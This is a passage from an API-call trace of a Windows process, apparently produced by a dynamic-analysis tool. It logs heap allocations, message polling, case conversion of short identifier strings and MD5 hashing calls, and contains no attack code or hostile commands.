(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.608] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0263.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.610] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.610] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.610] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0263.610] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.611] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.611] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.611] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.612] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.612] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.612] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.613] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.613] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.613] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.613] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.614] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.614] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.615] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.617] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.617] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.618] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.618] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.618] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.618] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.618] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.619] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.619] CryptHashData (hHash=0xaa57a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.619] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.620] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.620] 